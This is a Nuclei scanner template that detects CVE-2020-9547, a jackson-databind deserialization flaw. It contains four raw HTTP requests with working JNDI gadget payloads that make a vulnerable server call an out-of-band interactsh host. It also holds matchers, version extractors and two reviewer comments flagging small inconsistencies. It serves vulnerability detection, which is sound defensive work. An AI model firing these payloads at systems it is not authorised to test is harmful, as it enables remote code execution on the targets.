# Nuclei template for CVE-2020-9547: out-of-band detection of jackson-databind
# polymorphic deserialization via the JtaTransactionConfig gadget. Each of the
# four requests points a JdbcRowSetImpl dataSourceName at an interactsh callback
# URL; a finding requires the callback, an error keyword in the response body
# and one of the listed status codes to all be present (matchers-condition: and).
id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization RCE
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between
    serialization gadgets and typing, related to
    com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
    This vulnerability allows attackers to execute arbitrary code through deserialization
    of untrusted data when polymorphic type handling (@JsonTypeInfo with
    use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the
    affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively,
    disable polymorphic type handling or implement proper input validation and
    deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547
    - https://cve.report/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.00943
    epss-percentile: 0.81205
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    # One request per raw block below.
    max-request: 4
    vendor: fasterxml
    product: jackson-databind
    shodan-query: cpe:"cpe:2.3:o:debian:debian_linux"
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,kev

variables:
  # Random marker embedded in the User-Agent header and in every callback URL.
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"
  payload_jndi_rmi: "rmi://{{interactsh-url}}/{{randstr}}"
  payload_dns: "{{randstr}}.{{interactsh-url}}"

http:
  - raw:
      # Request 1: POST /, LDAP callback.
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}]}]

      # Request 2: POST /api, RMI callback. NOTE(review): 'rmi' is not one of the
      # protocols the dsl matcher checks below; presumably this request registers
      # through the DNS resolution of {{interactsh-url}} - confirm.
      - |
        POST /api HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@class":"java.util.HashMap","userTransactionName":{"@class":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_rmi}}","autoCommit":true}}}

      # Request 3: POST /json, DNS callback.
      - |
        POST /json HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"id":1,"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":["java.util.Properties",{"dataSource":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"dns://{{payload_dns}}","autoCommit":true}]}]}

      # Request 4: PUT /data, LDAP callback.
      - |
        PUT /data HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        [{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","dataSource":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}}}]

    # All three matchers must pass for a finding to be reported.
    matchers-condition: and
    matchers:
      # Out-of-band evidence: interactsh observed a DNS, LDAP or HTTP interaction.
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns') || contains(interactsh_protocol, 'ldap') || contains(interactsh_protocol, 'http')"

      # In-band evidence: a Jackson or JNDI error keyword in the response body.
      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JtaTransactionConfig"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or

      # Accepted response codes; 400/500 cover the error page a failed
      # deserialization commonly returns.
      - type: status
        status:
          - 200
          - 400
          - 500
        condition: or

    extractors:
      # Library version when the response body leaks it (capture group 1).
      - type: regex
        name: jackson_version
        part: body
        regex:
          - "jackson-databind ([0-9.]+)"
          - "com\\.fasterxml\\.jackson\\.databind ([0-9.]+)"
        group: 1

      # Error line naming the gadget class or the unresolved type id.
      # NOTE(review): inside YAML double quotes "\n" is turned into a literal
      # newline before the regex engine sees it; [^<newline>] still behaves as
      # intended, but "\\n" would state the intent unambiguously.
      - type: regex
        name: vulnerability_evidence
        part: body
        regex:
          - "(JtaTransactionConfig.*Exception[^\n]*)"
          - "(Could not resolve type id[^\n]*)"